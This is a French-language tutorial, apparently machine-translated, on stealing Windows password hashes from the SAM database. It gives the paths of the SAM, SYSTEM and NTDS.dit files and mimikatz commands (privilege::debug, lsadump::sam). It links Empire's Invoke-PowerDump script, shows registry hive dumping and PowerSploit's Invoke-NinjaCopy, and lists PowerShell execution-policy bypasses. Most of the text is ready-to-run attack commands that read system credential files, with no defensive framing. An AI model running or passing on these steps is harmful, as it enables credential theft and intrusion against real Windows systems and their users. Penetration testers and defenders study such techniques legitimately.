Préface
emplacement du fichier ntds.dit: emplacement du fichier
C:\Windows\NTDS\NTDS.dit
système : emplacement du fichierC:\Windows\System32\config\SYSTEM
sam:C:\Windows\System32\config\SAM
#Méthode d'obtention du hachage utilisateur via la base de données SAM
Lecture à distance
mimikatz lit la base de données SAM en ligne
privilège :: debug
token ::
elevate lsadump :: sam
PowerShell
À l'aide d'un script PowerShell dans empire, téléchargez l'adresse:
https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-PowerDump.ps1
De gauche à droite se trouve le nom d'utilisateur, Rid, ntlm , Lm.
Un débarrassé de 500 représente un administrateur, 504 représente un compte invité, etc. La différence entre lm et ntlm réside dans la méthode de chiffrement. Vous pouvez lire ce blog pour plus de détails .
Craquage hors ligne
Comment télécharger les fichiers système et sam
Utiliser le registre (nécessite des autorisations d'administrateur)
Obtenez le fichier de base de données SAM du système actuel et lisez-le sous un autre système. L'extraction du hachage du mot de passe utilisateur local du système cible à partir de SAM nécessite des privilèges d'administrateur.
reg save HKLM \ SYSTEM system.hiv
reg save HKLM \ SAM sam.hiv
Obtenez sam et système via NinjaCopy
Adresse de téléchargement de ninjacopy: https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1
Import-Module -name .\Invoke-NinjaCopy.ps1
Invoke-NinjaCopy -Path "C:\Windows\System32\config\SYSTEM" -LocalDestination "c:\system.hiv"
Invoke-NinjaCopy -Path "C:\Windows\System32\config\SAM" -LocalDestination "c:\sam.hiv"
Annexe: Commandes pour contourner la stratégie d'exécution
PowerShell : cmd: powershell -ep bypass
powershell: Set-ExecutionPolicy Bypass -Scope Process
Vous pouvez également vous référer au lien suivant pour
contourner la stratégie d'exécution PowerShell
Décrypter les données du fichier SAM
En utilisant mimikatz, le paramètre est le chemin du système et des fichiers sam que vous venez de télécharger:
lsadump::sam /sam:sam.hiv /system:system.hiv